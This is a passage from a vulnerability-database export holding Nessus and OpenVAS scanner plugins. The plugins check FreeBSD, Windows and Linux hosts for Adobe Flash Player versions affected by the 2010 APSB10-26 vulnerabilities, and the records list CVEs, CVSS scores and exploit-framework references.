{"id": "FREEBSD_PKG_76B597E4E9C611DF9E10001B2134EF46.NASL", "bulletinFamily": "scanner", "title": "FreeBSD : linux-flashplugin -- multiple vulnerabilities (76b597e4-e9c6-11df-9e10-001b2134ef46)", "description": "Adobe Product Security Incident Response Team reports :\n\nCritical vulnerabilities have been identified in Adobe Flash Player\n10.1.85.3 and earlier versions for Windows, Macintosh, Linux, and\nSolaris, and Adobe Flash Player 10.1.95.1 for Android. These\nvulnerabilities, including CVE-2010-3654 referenced in Security\nAdvisory APSA10-05, could cause the application to crash and could\npotentially allow an attacker to take control of the affected system.", "published": "2010-11-08T00:00:00", "modified": "2010-11-08T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/50505", "reporter": "This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.adobe.com/support/security/bulletins/apsb10-26.html", "https://www.adobe.com/support/security/advisories/apsa10-05.html", "http://www.nessus.org/u?ba5a6346"], "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3676", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "type": "nessus", "lastseen": "2021-01-07T10:45:52", "edition": 25, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:136141256231068493", "OPENVAS:1361412562310801630", "OPENVAS:1361412562310801629", "OPENVAS:801629", "OPENVAS:68493", "OPENVAS:1361412562310850149", "OPENVAS:850149", "OPENVAS:69045", "OPENVAS:136141256231069045", "OPENVAS:801630"]}, {"type": "freebsd", "idList": ["76B597E4-E9C6-11DF-9E10-001B2134EF46"]}, {"type": "nessus", "idList": ["SUSE_11_FLASH-PLAYER-101104.NASL", "ADOBE_AIR_APSB10-26.NASL", "REDHAT-RHSA-2010-0834.NASL", "SUSE_11_3_FLASH-PLAYER-101104.NASL", "SUSE_11_1_FLASH-PLAYER-101104.NASL", "ADOBE_ACROBAT_APSB10-28.NASL", "SUSE_11_2_FLASH-PLAYER-101104.NASL", "FLASH_PLAYER_APSB10-26.NASL", "REDHAT-RHSA-2010-0867.NASL", "REDHAT-RHSA-2010-0829.NASL"]}, {"type": "redhat", "idList": ["RHSA-2010:0829", "RHSA-2010:0834", "RHSA-2010:0934", "RHSA-2010:0867"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:25091", "SECURITYVULNS:VULN:11619", "SECURITYVULNS:DOC:25153", "SECURITYVULNS:VULN:11239", "SECURITYVULNS:DOC:26202", "SECURITYVULNS:DOC:25089"]}, {"type": "suse", "idList": ["SUSE-SA:2010:058", "SUSE-SA:2010:055"]}, {"type": "cve", "idList": ["CVE-2010-3650", "CVE-2010-3645", "CVE-2010-3637", "CVE-2010-3649", "CVE-2010-3676", "CVE-2010-3654", "CVE-2010-3652", "CVE-2010-3642", "CVE-2010-3643", "CVE-2010-3644"]}, {"type": "symantec", "idList": ["SMNTC-44679", "SMNTC-44504", "SMNTC-44684"]}, {"type": "gentoo", "idList": ["GLSA-201101-09"]}, {"type": "exploitdb", "idList": ["EDB-ID:16667", "EDB-ID:34522", "EDB-ID:15426"]}, {"type": "saint", "idList": ["SAINT:B5657AFB338B1DE1878BED26F331E06E", "SAINT:0F4E1C742351171F6A7E81111D6518CC", "SAINT:81B135AB58085F29890F2C48E7DD9175"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/ADOBE_FLASHPLAYER_BUTTON"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:95444"]}, {"type": "canvas", "idList": ["ADOBE_FLASH_BUTTON"]}, {"type": "seebug", "idList": ["SSV:20218", "SSV:70138", "SSV:71175", "SSV:71627"]}, {"type": "threatpost", "idList": ["THREATPOST:DAFE4C40F672DA84E11AC6FFC2BBB716", "THREATPOST:2606196DD3F3AF9E687F63426BF161F9", "THREATPOST:731A5A35EAC80BFED9629C1E359C6390"]}, {"type": "cert", "idList": ["VU:298081"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:3AD9D29B4D1CC018F70F8B0E9B899EC2", "EXPLOITPACK:92497A482BC4B4CFEF587918EBBCB69E"]}, {"type": "jvn", "idList": ["JVN:48425028"]}], "modified": "2021-01-07T10:45:52", "rev": 2}, "score": {"value": 9.3, "vector": "NONE", "modified": "2021-01-07T10:45:52", "rev": 2}, "vulnersScore": 9.3}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50505);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\", \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3652\", \"CVE-2010-3654\", \"CVE-2010-3676\");\n\n script_name(english:\"FreeBSD : linux-flashplugin -- multiple vulnerabilities (76b597e4-e9c6-11df-9e10-001b2134ef46)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Product Security Incident Response Team reports :\n\nCritical vulnerabilities have been identified in Adobe Flash Player\n10.1.85.3 and earlier versions for Windows, Macintosh, Linux, and\nSolaris, and Adobe Flash Player 10.1.95.1 for Android. These\nvulnerabilities, including CVE-2010-3654 referenced in Security\nAdvisory APSA10-05, could cause the application to crash and could\npotentially allow an attacker to take control of the affected system.\"\n );\n # http://www.adobe.com/support/security/bulletins/apsb10-26.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb10-26.html\"\n );\n # http://www.adobe.com/support/security/advisories/apsa10-05.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/advisories/apsa10-05.html\"\n );\n # https://vuxml.freebsd.org/freebsd/76b597e4-e9c6-11df-9e10-001b2134ef46.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ba5a6346\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"Button\" Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f8-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/09/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-flashplugin<9.0r289\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f8-flashplugin<10.1r102\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f10-flashplugin<10.1r102\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "FreeBSD Local Security Checks", "pluginID": "50505", "cpe": ["p-cpe:/a:freebsd:freebsd:linux-flashplugin", "p-cpe:/a:freebsd:freebsd:linux-f8-flashplugin", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin"], "scheme": null}

{"openvas": [{"lastseen": "2018-01-22T13:05:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3676", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2018-01-22T00:00:00", "published": "2010-11-17T00:00:00", "id": "OPENVAS:136141256231068493", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231068493", "type": "openvas", "title": "FreeBSD Ports: linux-flashplugin", "sourceData": "#\n#VID 76b597e4-e9c6-11df-9e10-001b2134ef46\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 76b597e4-e9c6-11df-9e10-001b2134ef46\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n linux-flashplugin\n linux-f8-flashplugin\n linux-f10-flashplugin\n\nFor details on the issues addressed, please visit the referenced\nsecurity advisories.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.adobe.com/support/security/bulletins/apsb10-26.html\nhttp://www.adobe.com/support/security/advisories/apsa10-05.html\nhttp://www.vuxml.org/freebsd/76b597e4-e9c6-11df-9e10-001b2134ef46.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.68493\");\n script_version(\"$Revision: 8485 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-22 08:57:57 +0100 (Mon, 22 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-17 03:33:48 +0100 (Wed, 17 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\", \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3652\", \"CVE-2010-3654\", \"CVE-2010-3676\");\n script_name(\"FreeBSD Ports: linux-flashplugin\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"linux-flashplugin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"9.0r289\")<0) {\n txt += 'Package linux-flashplugin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-f8-flashplugin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"10.1r102\")<0) {\n txt += 'Package linux-f8-flashplugin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-f10-flashplugin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"10.1r102\")<0) {\n txt += 'Package linux-f10-flashplugin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:09:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3676", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2017-02-09T00:00:00", "published": "2010-11-17T00:00:00", "id": "OPENVAS:68493", "href": "http://plugins.openvas.org/nasl.php?oid=68493", "type": "openvas", "title": "FreeBSD Ports: linux-flashplugin", "sourceData": "#\n#VID 76b597e4-e9c6-11df-9e10-001b2134ef46\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 76b597e4-e9c6-11df-9e10-001b2134ef46\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n linux-flashplugin\n linux-f8-flashplugin\n linux-f10-flashplugin\n\nFor details on the issues addressed, please visit the referenced\nsecurity advisories.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.adobe.com/support/security/bulletins/apsb10-26.html\nhttp://www.adobe.com/support/security/advisories/apsa10-05.html\nhttp://www.vuxml.org/freebsd/76b597e4-e9c6-11df-9e10-001b2134ef46.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(68493);\n script_version(\"$Revision: 5245 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-09 09:57:08 +0100 (Thu, 09 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-17 03:33:48 +0100 (Wed, 17 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\", \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3652\", \"CVE-2010-3654\", \"CVE-2010-3676\");\n script_name(\"FreeBSD Ports: linux-flashplugin\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"linux-flashplugin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"9.0r289\")<0) {\n txt += 'Package linux-flashplugin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-f8-flashplugin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"10.1r102\")<0) {\n txt += 'Package linux-f8-flashplugin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-f10-flashplugin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"10.1r102\")<0) {\n txt += 'Package linux-f10-flashplugin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:40:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "description": "This host is installed with Adobe Flash Player and is prone to\n multiple unspecified vulnerabilities.", "modified": "2019-05-17T00:00:00", "published": "2010-11-12T00:00:00", "id": "OPENVAS:1361412562310801629", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801629", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities (Windows)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801629\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2010-11-12 15:34:28 +0100 (Fri, 12 Nov 2010)\");\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\",\n \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\",\n \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\",\n \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3652\");\n script_bugtraq_id(44669);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/41917\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-26.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n script_tag(name:\"impact\", value:\"Successful exploitation will let attackers to execute arbitrary code or cause\n a denial of service via unknown vectors.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 10.1.85.3 and prior on Windows\");\n script_tag(name:\"insight\", value:\"The flaws are caused by unspecified errors, that can be exploited to execute\n arbitrary code or cause a denial of service.\");\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version 10.1.102.64 or later\");\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to\n multiple unspecified vulnerabilities.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/downloads/\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif( version_in_range( version:vers, test_version:\"10\", test_version2:\"10.1.85.3\" ) ||\n version_is_less( version:vers, test_version:\"9.0.289.0\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"10.1.102.64\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:40:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "description": "This host is installed with Adobe Flash Player and is prone to\n multiple unspecified vulnerabilities.", "modified": "2018-12-04T00:00:00", "published": "2010-11-12T00:00:00", "id": "OPENVAS:1361412562310801630", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801630", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_flash_player_mult_vuln_nov10_lin.nasl 12653 2018-12-04 15:31:25Z cfischer $\n#\n# Adobe Flash Player Multiple Vulnerabilities (Linux)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801630\");\n script_version(\"$Revision: 12653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-04 16:31:25 +0100 (Tue, 04 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-12 15:34:28 +0100 (Fri, 12 Nov 2010)\");\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\",\n \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\",\n \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\",\n \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3652\");\n script_bugtraq_id(44669);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities (Linux)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/41917\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-26.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation will let attackers to execute arbitrary code or cause\n a denial of service via unknown vectors.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 10.1.85.3 and prior on Linux\");\n script_tag(name:\"insight\", value:\"The flaws are caused by unspecified errors, that can be exploited to execute\n arbitrary code or cause a denial of service.\");\n 